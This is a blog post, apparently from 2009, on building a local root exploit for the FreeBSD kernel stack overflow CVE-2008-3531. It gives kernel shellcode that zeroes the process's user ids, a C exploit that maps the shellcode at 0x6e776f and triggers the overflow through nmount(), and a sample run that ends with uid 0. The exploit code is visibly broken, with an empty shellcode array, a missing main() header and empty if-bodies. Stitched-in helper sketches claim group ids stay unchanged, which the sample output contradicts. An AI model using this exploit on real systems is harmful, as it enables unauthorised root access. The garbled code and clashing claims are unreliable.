POSTED BY: Patroklos Argyroudis / 02.07.2009

CVE-2008-3531: FreeBSD kernel stack overflow exploit development

About four months ago I developed a reliable exploit for vulnerability CVE-2008-3531, which is also addressed in the advisory FreeBSD-SA-08:08.nmount. In this post I will use this vulnerability to provide an overview of the development process for FreeBSD kernel stack exploits.

CVE-2008-3531 is a kernel stack overflow vulnerability that affects FreeBSD versions 7.0-RELEASE and 7.0-STABLE but, contrary to what the CVE entry seems to suggest, neither 7.1-RELEASE nor 7.1-STABLE.

The bug is in function vfs_filteropt() at src/sys/kern/vfs_mount.c:

1800:    int
1801:    vfs_filteropt(struct vfsoptlist *opts, const char **legal)
1802:    {
1803:        struct vfsopt *opt;
1804:        char errmsg[255];
1805:        const char **t, *p, *q;
1806:        int ret = 0;
1808:        TAILQ_FOREACH(opt, opts, link) {
1809:                p = opt->name;
1810:                q = NULL;
1811:                if (p[0] == 'n' && p[1] == 'o')
1812:                        q = p + 2;
1813:                for(t = global_opts; *t != NULL; t++) {
1814:                        if (strcmp(*t, p) == 0)
1815:                                break;
1816:                        if (q != NULL) {
1817:                                if (strcmp(*t, q) == 0)
1818:                                        break;
1819:                        }
1820:                }
1821:                if (*t != NULL)
1822:                        continue;
1823:                for(t = legal; *t != NULL; t++) {
1824:                        if (strcmp(*t, p) == 0)
1825:                                break;
1826:                        if (q != NULL) {
1827:                                if (strcmp(*t, q) == 0)
1828:                                        break;
1829:                        }
1830:                }
1831:                if (*t != NULL)
1832:                        continue;
1833:                sprintf(errmsg, "mount option <%s> is unknown", p);
1834:                printf("%s\n", errmsg);
1835:                ret = EINVAL;
1836:        }
1837:        if (ret != 0) {
1838:                TAILQ_FOREACH(opt, opts, link) {
1839:                        if (strcmp(opt->name, "errmsg") == 0) {
1840:                              strncpy((char *)opt->value, errmsg, opt->len);
1841:                        }
1842:                }
1843:        }
1844:        return (ret);
1845:    }

The first step of the exploit development process involves identifying the vulnerability’s conditions and assessing its impact.

In line 1833, sprintf() writes an error message to errmsg, a fixed-size local buffer of 255 bytes declared in line 1804. The variable p used in the sprintf() call is a pointer to the mount option’s name. Conceptually, a mount option is a tuple of the form (name, value). The vulnerable sprintf() call can be reached from userland when the option’s name matches no entry in either global_opts or legal, with or without its leading “no” prefix (the checks performed by the two for loops inside the first TAILQ_FOREACH loop). For example, the tuple (“AAAA”, “BBBB”) satisfies this condition: “AAAA” is not a recognized option name, so execution reaches line 1833 with p pointing to the string “AAAA”. Both the mount option’s name (p) and its value are user-controlled, and sprintf() performs no bounds checking, so a mount option name of arbitrary length (and, less importantly in this case, as we will see below, arbitrary content) overflows errmsg. Since errmsg is on a kernel stack, we can use the overflow to corrupt the current stack frame’s saved return address, with the ultimate goal of diverting the kernel’s execution flow to code of our own choosing.
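
To make the size mismatch concrete, here is a minimal user-space sketch (not kernel code) that measures how many bytes the format string produces for a name of a given length and compares that with a bounded snprintf() call. The helper names formatted_len() and bounded_strlen() are hypothetical and exist only for this illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ERRMSG_SIZE 255 /* size of errmsg in vfs_filteropt() */
#define FMT "mount option <%s> is unknown"

/* Build a heap string of name_len 'A' characters (caller frees). */
static char *make_name(size_t name_len)
{
    char *name = malloc(name_len + 1);
    if (name == NULL)
        return NULL;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    return name;
}

/* Characters (excluding the NUL) an unbounded sprintf() would write. */
static int formatted_len(size_t name_len)
{
    char *name = make_name(name_len);
    int n;
    if (name == NULL)
        return -1;
    n = snprintf(NULL, 0, FMT, name); /* measures only, writes nothing */
    free(name);
    return n;
}

/* Length of the message when the write is bounded to ERRMSG_SIZE bytes. */
static size_t bounded_strlen(size_t name_len)
{
    char errmsg[ERRMSG_SIZE];
    char *name = make_name(name_len);
    if (name == NULL)
        return 0;
    snprintf(errmsg, sizeof(errmsg), FMT, name); /* truncates, always NUL-terminates */
    free(name);
    return strlen(errmsg);
}
```

The fixed text of the format string accounts for 26 characters, so under this sketch any name longer than 228 characters needs more than the 255 bytes available in errmsg once the terminating NUL is counted.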

Now that we have explored the conditions and concluded that we can indeed achieve arbitrary code execution, we have to explore the ways in which we can trigger the vulnerability. There are many possible execution paths to reach vfs_filteropt() from userland. After browsing FreeBSD’s file system stacking source code for a couple of minutes, I decided to use the following:

nmount() -> vfs_donmount() -> msdosfs_mount() -> vfs_filteropt()

By default on FreeBSD the nmount(2) system call can only be called by root. In order for it to be enabled for unprivileged users the sysctl(8) variable vfs.usermount must be set to a non-zero value.

At this point we know that the vulnerability can potentially lead to arbitrary code execution and how to trigger it. The next step is to find a place to store our arbitrary code and divert the kernel’s execution flow to that memory address. Due to the structure of the format string used in the sprintf() call, we do not have direct control of the value that overwrites the saved return address in vfs_filteropt()’s kernel stack frame.

However, indirect control is more than enough to achieve arbitrary code execution. When p points to a string of 248 ‘A’s followed by a NUL terminator (i.e. 248 * ‘A’ + ‘\0’), the saved return address is overwritten with the value 0x6e776f: the last four bytes that sprintf() writes are ‘o’, ‘w’, ‘n’ and the terminating ‘\0’, which i386 reads in little-endian order, hence the “nwo” of “unknown” in the format string. Borrowing from the exploitation methodology of kernel NULL pointer dereference vulnerabilities, we can use mmap(2) to map memory at the page boundary 0x6e7000 and place our kernel shellcode 0x76f bytes after that. Therefore, when the corrupted saved return address 0x6e776f is loaded into the EIP register on return, the kernel will execute the instructions we have mapped at this address.
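
The arithmetic behind these numbers can be checked with a small user-space sketch. It assumes a little-endian 32-bit target with 4096-byte pages, as on i386; the helper names are hypothetical and serve only this illustration.

```c
#include <stdint.h>

#define PAGE_SZ 4096u /* assumed i386 page size */

/* Read four bytes as a little-endian 32-bit value, the way i386
 * interprets the saved return address when it is popped off the stack. */
static uint32_t le32(const unsigned char *b)
{
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Value formed by the last four bytes the format string ends with:
 * 'o', 'w', 'n' and the terminating NUL. */
static uint32_t overwritten_return_address(void)
{
    static const char tail[] = "unknown"; /* sizeof counts the NUL */
    return le32((const unsigned char *)tail + sizeof(tail) - 4);
}

/* Start of the page that contains addr. */
static uint32_t page_base(uint32_t addr)
{
    return addr & ~(PAGE_SZ - 1);
}

/* Offset of addr within its page. */
static uint32_t page_offset(uint32_t addr)
{
    return addr & (PAGE_SZ - 1);
}
```

For 0x6e776f this gives a page base of 0x6e7000 and an offset of 0x76f, which is 1903 in decimal.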

The next step in the exploit development process is to write these instructions. Specifically, our kernel shellcode should:

  • locate the credentials of the user that triggers the vulnerability and escalate their privileges,
  • ensure kernel continuation. In other words, the system must be kept running and stable after exploitation.

User credentials specifying the process owner’s privileges in FreeBSD are stored in a structure of type ucred defined at src/sys/sys/ucred.h:

struct ucred {
    u_int   cr_ref;                 /* reference count */
#define cr_startcopy cr_uid
    uid_t   cr_uid;                 /* effective user id */
    uid_t   cr_ruid;                /* real user id */
    uid_t   cr_svuid;               /* saved user id */
    short   cr_ngroups;             /* number of groups */
    gid_t   cr_groups[NGROUPS];     /* groups */
    gid_t   cr_rgid;                /* real group id */
    gid_t   cr_svgid;               /* saved group id */
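
Since kernel shellcode addresses these fields by byte offset rather than by name, it helps to see where the first few members land. The following is a minimal sketch using a hypothetical mirror structure, ucred_prefix, under the assumption that u_int and uid_t are both 32 bits wide, as on i386; it is not the kernel’s own definition.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the leading ucred fields; 32-bit u_int and
 * uid_t are assumed here (i386). */
struct ucred_prefix {
    uint32_t cr_ref;   /* reference count */
    uint32_t cr_uid;   /* effective user id */
    uint32_t cr_ruid;  /* real user id */
    uint32_t cr_svuid; /* saved user id */
};

/* Byte offsets of the id fields from the start of the structure. */
static size_t off_cr_uid(void)   { return offsetof(struct ucred_prefix, cr_uid); }
static size_t off_cr_ruid(void)  { return offsetof(struct ucred_prefix, cr_ruid); }
static size_t off_cr_svuid(void) { return offsetof(struct ucred_prefix, cr_svuid); }
```

Under these assumptions cr_uid sits at offset 0x4 and cr_ruid at offset 0x8, the two offsets the shellcode further down writes to.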

A pointer to the ucred structure exists in a structure of type proc defined at src/sys/sys/proc.h:

struct proc {
 LIST_ENTRY(proc) p_list;           /* (d) List of all processes. */
 TAILQ_HEAD(, thread) p_threads;    /* (j) all threads. */
 TAILQ_HEAD(, kse_upcall) p_upcalls; /* (j) All upcalls in the proc. */
 struct mtx      p_slock;           /* process spin lock */
 struct ucred    *p_ucred;          /* (c) Process owner's identity. */

The address of the proc structure can be dynamically located at runtime from unprivileged processes in a number of ways:

  • The sysctl(3) kernel interface and the kinfo_proc structure.
  • The allproc symbol that the FreeBSD kernel exports by default.
  • The curthread pointer from the pcpu structure (segment FS in kernel context points to it).

You can find more information about the first alternative in the talk I gave on FreeBSD kernel stack overflows at the University of Piraeus Software Libre Society, Event #16: Computer Security (unfortunately the slides from the talk are only available in Greek currently). The second alternative will be the subject of a future post. In the developed exploit I will use the third alternative.

The other task that our shellcode should perform is to maintain the stability of the system by ensuring the kernel’s continuation. One way to approach this would be to port Silvio Cesare’s “iret” return to userland approach (presented at his “Open source kernel auditing and exploitation” Black Hat talk) to FreeBSD. Although a full investigation of Silvio’s “iret” technique on FreeBSD would be very interesting, it is beyond the scope of this post.

In order to successfully return to userland from the kernel shellcode I will use another approach. Remember that the execution path I decided to take is nmount() -> vfs_donmount() -> msdosfs_mount() -> vfs_filteropt(). After the shellcode has performed privilege escalation, it could return to where vfs_filteropt() was supposed to return, that is, into msdosfs_mount(). However, that is not possible, since msdosfs_mount()’s saved registers were corrupted when vfs_filteropt()’s stack frame was smashed by the overflow. The values of these saved registers cannot be restored; consequently, there is no safe way to return to msdosfs_mount() after privilege escalation. The solution I have implemented in the exploit bypasses msdosfs_mount() completely and returns to the caller of vfs_filteropt()’s caller, namely vfs_donmount(). The saved register values of vfs_donmount() are uncorrupted in msdosfs_mount()’s stack frame. To make this clearer, consider the following pseudocode, which is based on the relevant part of the disassembly:

/* this function's saved registers' values are uncorrupted */

    /* stack cleanup, restore saved registers */
    addl    $0xe8, %esp
    popl    %ebx
    popl    %esi
    popl    %edi
    popl    %ebp

Taking into consideration the above analysis, the complete kernel shellcode for the developed exploit is the following (you can download it from here):

.global _start

movl    %fs:0, %eax         # get curthread
movl    0x4(%eax), %eax     # get proc from curthread
movl    0x30(%eax), %eax    # get ucred from proc
xorl    %ecx, %ecx          # ecx = 0
movl    %ecx, 0x4(%eax)     # ucred.cr_uid = 0 (effective user id)
movl    %ecx, 0x8(%eax)     # ucred.cr_ruid = 0 (real user id)

# return to the caller of vfs_filteropt()'s caller, i.e. vfs_donmount()
addl    $0xe8, %esp
popl    %ebx
popl    %esi
popl    %edi
popl    %ebp
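
The pointer chain that the first half of the shellcode follows can be modelled in plain user-space C. This is only a sketch with mock structures (mock_thread, mock_proc and mock_ucred are hypothetical and contain just the fields involved); it does not reproduce the kernel’s layouts or offsets, and it runs entirely on its own data.

```c
#include <stdint.h>

/* Mock stand-ins holding only the fields the shellcode touches. */
struct mock_ucred  { uint32_t cr_ref, cr_uid, cr_ruid; };
struct mock_proc   { struct mock_ucred *p_ucred; };
struct mock_thread { struct mock_proc *td_proc; };

/* Follow thread -> proc -> ucred and clear both user ids. */
static void zero_ids(struct mock_thread *curthread)
{
    struct mock_proc *p = curthread->td_proc; /* proc from curthread */
    struct mock_ucred *cred = p->p_ucred;     /* ucred from proc */

    cred->cr_uid = 0;  /* effective user id */
    cred->cr_ruid = 0; /* real user id */
}

/* Build a mock chain owned by uid, run zero_ids() on it, and return
 * the bitwise OR of the two ids afterwards (0 means both were cleared). */
static uint32_t demo_ids_after(uint32_t uid)
{
    struct mock_ucred cred = { 1, uid, uid };
    struct mock_proc proc = { &cred };
    struct mock_thread td = { &proc };

    zero_ids(&td);
    return cred.cr_uid | cred.cr_ruid;
}
```

In the model, as in the shellcode, only the effective and real user ids are changed; the group ids are left as they were, which matches the gid and egid values in the sample run at the end of the post.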

Now we have a way to safely return from kernel to userland and ensure the continuation of the exploited system. The complete exploit is (you can download it from here):

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/uio.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>

#define BUFSIZE     249

#define PAGESIZE    4096
#define ADDR        0x6e7000
#define OFFSET      1903

#define FSNAME      "msdosfs"
#define DIRPATH     "/tmp/msdosfs"

unsigned char kernelcode[] =

    void *vptr;
    struct iovec iov[6];

    vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,
            MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);

    if(vptr == MAP_FAILED)

    vptr += OFFSET;
    printf("[*] vptr = 0x%.8x\n", (unsigned int)vptr);

    memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));

    mkdir(DIRPATH, 0700);

    iov[0].iov_base = "fstype";
    iov[0].iov_len = strlen(iov[0].iov_base) + 1;
    iov[1].iov_base = FSNAME;
    iov[1].iov_len = strlen(iov[1].iov_base) + 1;
    iov[2].iov_base = "fspath";
    iov[2].iov_len = strlen(iov[2].iov_base) + 1;
    iov[3].iov_base = DIRPATH;
    iov[3].iov_len = strlen(iov[3].iov_base) + 1;

    iov[4].iov_base = calloc(BUFSIZE, sizeof(char));

    if(iov[4].iov_base == NULL)

    memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));
    iov[4].iov_len = BUFSIZE;

    iov[5].iov_base = "BBBB";
    iov[5].iov_len = strlen(iov[5].iov_base) + 1;

    printf("[*] calling nmount()\n");

    if(nmount(iov, 6, 0) < 0)

    printf("[*] unmounting and deleting %s\n", DIRPATH);
    unmount(DIRPATH, 0);

    return EXIT_SUCCESS;

Finally, a sample run of the exploit:

[argp@leon ~]$ uname -rsi
[argp@leon ~]$ sysctl vfs.usermount
vfs.usermount: 1
[argp@leon ~]$ id
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531
[argp@leon ~]$ ./cve-2008-3531
[*] vptr = 0x006e776f
[*] calling nmount()
nmount: Unknown error: -1036235776
[argp@leon ~]$ id
uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)

And this concludes my post. I hope you enjoyed reading this as much as I enjoyed writing it.